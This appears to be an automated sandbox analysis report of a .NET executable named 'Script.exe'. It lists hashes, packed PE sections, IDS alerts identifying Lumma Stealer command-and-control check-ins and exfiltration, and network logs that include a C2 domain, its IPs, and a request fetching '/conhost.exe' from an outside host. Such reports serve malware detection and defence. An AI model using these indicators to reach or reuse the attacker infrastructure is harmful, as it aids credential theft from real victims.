File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.760343533212073
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.96% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Script.exe
File size:	709'632 bytes
MD5:	e9c36f6a03694c88081409d38d76b9e8
SHA1:	59356b5d0918fd2c402ebfff702846100d02a7f1
SHA256:	980a90b7a738a090f4775800a3de183f2e9d94ce54f882e443c2d01105badb4d
SHA512:	2b1bca06924d55760a008b3ad4e53bbbecc710b508d514a7ee082fea45efb1b842f1a4c8767458f9a9a4bc185a83616d5c66e7f7ae882bda5f117e7b13c3c123
SSDEEP:	12288:wxxd/NdjsFXJbzpaQPeNvddW7n/hXDOoqn+eJ3XbaiUFgQKPp0YkEN1PhdWLxX7c:wxv/NBsFaQ4bqZpunbaN2Q
TLSH:	D5E48CDC725072EFC867C472DEA81CA4FA9174BB931F4257A02706AD9A5D88BCF150F2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ag..............0..............@....... ....@.. .......................`............@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4b400a
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67410903 [Fri Nov 22 22:43:15 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [004B4000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x90834	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb0000	0x660	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb2000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb4000	0x8
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x90000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
)UHMIO	0x2000	0x8d164	0x8d200	7c765714ec3a5fb6d7928d9c33ccb891	False	1.0003217725863596	data	7.999726379594664	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.text	0x90000	0x1f0d8	0x1f200	0974b9de426dcb75372d674426c10a2b	False	0.3306821034136546	data	4.70688184769072	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xb0000	0x660	0x800	746fb3f53e0611fda732cac11882e9e1	False	0.35302734375	data	3.587933527710975	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xb2000	0xc	0x200	49ba7a9e1e9d0fde8dd025f5fdb99dfe	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
	0xb4000	0x10	0x200	d3fdef20fd434b97e14e5bcf76b9abbf	False	0.044921875	Applesoft BASIC program data, first line number 9	0.14263576814887827	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xb00a0	0x3d4	data			0.42551020408163265
RT_MANIFEST	0xb0474	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-23T03:11:08.080599+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49704	104.21.33.116	443	TCP
2024-11-23T03:11:08.987788+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49704	104.21.33.116	443	TCP
2024-11-23T03:11:08.987788+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49704	104.21.33.116	443	TCP
2024-11-23T03:11:10.417761+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49706	104.21.33.116	443	TCP
2024-11-23T03:11:11.170907+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49706	104.21.33.116	443	TCP
2024-11-23T03:11:11.170907+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49706	104.21.33.116	443	TCP
2024-11-23T03:11:12.715388+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49708	104.21.33.116	443	TCP
2024-11-23T03:11:14.940552+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49712	104.21.33.116	443	TCP
2024-11-23T03:11:17.297654+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49714	104.21.33.116	443	TCP
2024-11-23T03:11:19.787711+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49717	104.21.33.116	443	TCP
2024-11-23T03:11:20.533321+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49717	104.21.33.116	443	TCP
2024-11-23T03:11:22.208787+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49718	104.21.33.116	443	TCP
2024-11-23T03:11:26.257251+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49732	104.21.33.116	443	TCP
2024-11-23T03:11:26.990618+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49732	104.21.33.116	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 23, 2024 03:11:06.812257051 CET	49704	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:06.812294960 CET	443	49704	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:06.812664032 CET	49704	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:06.814203978 CET	49704	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:06.814230919 CET	443	49704	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:08.080513954 CET	443	49704	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:08.080599070 CET	49704	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:08.154491901 CET	49704	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:08.154541969 CET	443	49704	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:08.154869080 CET	443	49704	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:08.196454048 CET	49704	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:08.244086027 CET	49704	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:08.244123936 CET	49704	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:08.244208097 CET	443	49704	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:08.987796068 CET	443	49704	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:08.987905979 CET	443	49704	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:08.987957001 CET	49704	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:08.990395069 CET	49704	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:08.990412951 CET	443	49704	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:08.990431070 CET	49704	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:08.990437984 CET	443	49704	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:09.110794067 CET	49706	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:09.110869884 CET	443	49706	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:09.110959053 CET	49706	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:09.111448050 CET	49706	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:09.111485004 CET	443	49706	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:10.417644978 CET	443	49706	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:10.417761087 CET	49706	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:10.419154882 CET	49706	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:10.419164896 CET	443	49706	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:10.419540882 CET	443	49706	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:10.421128035 CET	49706	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:10.421169996 CET	49706	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:10.421217918 CET	443	49706	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:11.170907974 CET	443	49706	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:11.170950890 CET	443	49706	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:11.170978069 CET	443	49706	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:11.171000957 CET	49706	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:11.171006918 CET	443	49706	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:11.171017885 CET	443	49706	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:11.171046972 CET	49706	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:11.171063900 CET	443	49706	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:11.171103001 CET	49706	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:11.171113014 CET	443	49706	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:11.187464952 CET	443	49706	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:11.187524080 CET	49706	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:11.187534094 CET	443	49706	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:11.195856094 CET	443	49706	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:11.195935965 CET	49706	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:11.195945978 CET	443	49706	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:11.243341923 CET	49706	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:11.290221930 CET	443	49706	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:11.337085009 CET	49706	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:11.381196022 CET	443	49706	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:11.385087967 CET	443	49706	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:11.385140896 CET	49706	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:11.385153055 CET	443	49706	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:11.385179996 CET	443	49706	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:11.385224104 CET	49706	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:11.385339975 CET	49706	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:11.385350943 CET	443	49706	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:11.385365963 CET	49706	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:11.385371923 CET	443	49706	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:11.501441956 CET	49708	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:11.501488924 CET	443	49708	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:11.501566887 CET	49708	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:11.502026081 CET	49708	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:11.502042055 CET	443	49708	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:12.715249062 CET	443	49708	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:12.715388060 CET	49708	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:12.717031002 CET	49708	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:12.717067003 CET	443	49708	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:12.717314005 CET	443	49708	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:12.724642038 CET	49708	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:12.724786997 CET	49708	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:12.724833012 CET	443	49708	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:13.503556967 CET	443	49708	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:13.503662109 CET	443	49708	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:13.503734112 CET	49708	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:13.503916025 CET	49708	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:13.503961086 CET	443	49708	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:13.635437012 CET	49712	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:13.635509968 CET	443	49712	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:13.635602951 CET	49712	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:13.636003971 CET	49712	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:13.636024952 CET	443	49712	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:14.940458059 CET	443	49712	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:14.940551996 CET	49712	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:14.941631079 CET	49712	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:14.941634893 CET	443	49712	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:14.941862106 CET	443	49712	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:14.943048954 CET	49712	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:14.943175077 CET	49712	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:14.943206072 CET	443	49712	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:14.943262100 CET	49712	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:14.983334064 CET	443	49712	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:15.741034031 CET	443	49712	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:15.741156101 CET	443	49712	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:15.741225004 CET	49712	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:15.741372108 CET	49712	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:15.741396904 CET	443	49712	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:15.987951040 CET	49714	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:15.988029957 CET	443	49714	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:15.988112926 CET	49714	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:15.988413095 CET	49714	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:15.988430977 CET	443	49714	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:17.297530890 CET	443	49714	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:17.297653913 CET	49714	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:17.298886061 CET	49714	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:17.298899889 CET	443	49714	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:17.299128056 CET	443	49714	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:17.307059050 CET	49714	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:17.307176113 CET	49714	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:17.307208061 CET	443	49714	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:17.307490110 CET	49714	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:17.307498932 CET	443	49714	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:18.236356020 CET	443	49714	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:18.236442089 CET	443	49714	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:18.236511946 CET	49714	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:18.236634016 CET	49714	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:18.236639977 CET	443	49714	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:18.568764925 CET	49717	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:18.568845034 CET	443	49717	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:18.568928957 CET	49717	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:18.569279909 CET	49717	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:18.569314957 CET	443	49717	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:19.787602901 CET	443	49717	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:19.787710905 CET	49717	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:19.789128065 CET	49717	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:19.789154053 CET	443	49717	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:19.789402008 CET	443	49717	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:19.790788889 CET	49717	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:19.790875912 CET	49717	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:19.790888071 CET	443	49717	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:20.533324003 CET	443	49717	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:20.533409119 CET	443	49717	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:20.533611059 CET	49717	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:20.533739090 CET	49717	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:20.533781052 CET	443	49717	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:20.947491884 CET	49718	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:20.947544098 CET	443	49718	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:20.947633982 CET	49718	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:20.947943926 CET	49718	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:20.947954893 CET	443	49718	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:22.208698034 CET	443	49718	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:22.208786964 CET	49718	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:22.223342896 CET	49718	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:22.223361969 CET	443	49718	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:22.223591089 CET	443	49718	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:22.231755972 CET	49718	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:22.233123064 CET	49718	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:22.233153105 CET	443	49718	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:22.233686924 CET	49718	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:22.233720064 CET	443	49718	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:22.233994961 CET	49718	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:22.234041929 CET	443	49718	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:22.234716892 CET	49718	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:22.234749079 CET	443	49718	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:22.236563921 CET	49718	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:22.236597061 CET	443	49718	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:22.236769915 CET	49718	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:22.236800909 CET	443	49718	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:22.236814022 CET	49718	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:22.236825943 CET	443	49718	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:22.236972094 CET	49718	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:22.237000942 CET	443	49718	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:22.237020969 CET	49718	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:22.237169027 CET	49718	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:22.237193108 CET	49718	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:22.279372931 CET	443	49718	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:22.279553890 CET	49718	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:22.279577017 CET	443	49718	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:22.279603004 CET	49718	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:22.279625893 CET	443	49718	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:22.279656887 CET	49718	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:22.279675961 CET	443	49718	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:24.952424049 CET	443	49718	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:24.952503920 CET	443	49718	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:24.952666044 CET	49718	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:24.953282118 CET	49718	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:25.003704071 CET	49732	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:25.003732920 CET	443	49732	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:25.003844023 CET	49732	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:25.004118919 CET	49732	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:25.004128933 CET	443	49732	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:26.257138014 CET	443	49732	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:26.257251024 CET	49732	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:26.258493900 CET	49732	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:26.258502960 CET	443	49732	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:26.258761883 CET	443	49732	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:26.260010004 CET	49732	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:26.260036945 CET	49732	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:26.260077000 CET	443	49732	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:26.990623951 CET	443	49732	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:26.990704060 CET	443	49732	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:26.990762949 CET	49732	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:26.990906000 CET	49732	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:26.990921021 CET	443	49732	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:26.990931034 CET	49732	443	192.168.2.5	104.21.33.116
Nov 23, 2024 03:11:26.990936041 CET	443	49732	104.21.33.116	192.168.2.5
Nov 23, 2024 03:11:26.993880033 CET	49740	80	192.168.2.5	147.45.47.81
Nov 23, 2024 03:11:27.113317966 CET	80	49740	147.45.47.81	192.168.2.5
Nov 23, 2024 03:11:27.113434076 CET	49740	80	192.168.2.5	147.45.47.81
Nov 23, 2024 03:11:27.113620043 CET	49740	80	192.168.2.5	147.45.47.81
Nov 23, 2024 03:11:27.232997894 CET	80	49740	147.45.47.81	192.168.2.5
Nov 23, 2024 03:11:49.072151899 CET	80	49740	147.45.47.81	192.168.2.5
Nov 23, 2024 03:11:49.072283030 CET	49740	80	192.168.2.5	147.45.47.81
Nov 23, 2024 03:11:49.105950117 CET	49740	80	192.168.2.5	147.45.47.81
Nov 23, 2024 03:11:49.225545883 CET	80	49740	147.45.47.81	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 23, 2024 03:11:06.461883068 CET	56597	53	192.168.2.5	1.1.1.1
Nov 23, 2024 03:11:06.801789045 CET	53	56597	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 23, 2024 03:11:06.461883068 CET	192.168.2.5	1.1.1.1	0x1942	Standard query (0)	property-imper.sbs	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 23, 2024 03:11:06.801789045 CET	1.1.1.1	192.168.2.5	0x1942	No error (0)	property-imper.sbs		104.21.33.116	A (IP address)	IN (0x0001)	false
Nov 23, 2024 03:11:06.801789045 CET	1.1.1.1	192.168.2.5	0x1942	No error (0)	property-imper.sbs		172.67.162.84	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

property-imper.sbs

147.45.47.81

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49740	147.45.47.81	80	768	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
Nov 23, 2024 03:11:27.113620043 CET	198	OUT	GET /conhost.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 147.45.47.81

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	104.21.33.116	443	768	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
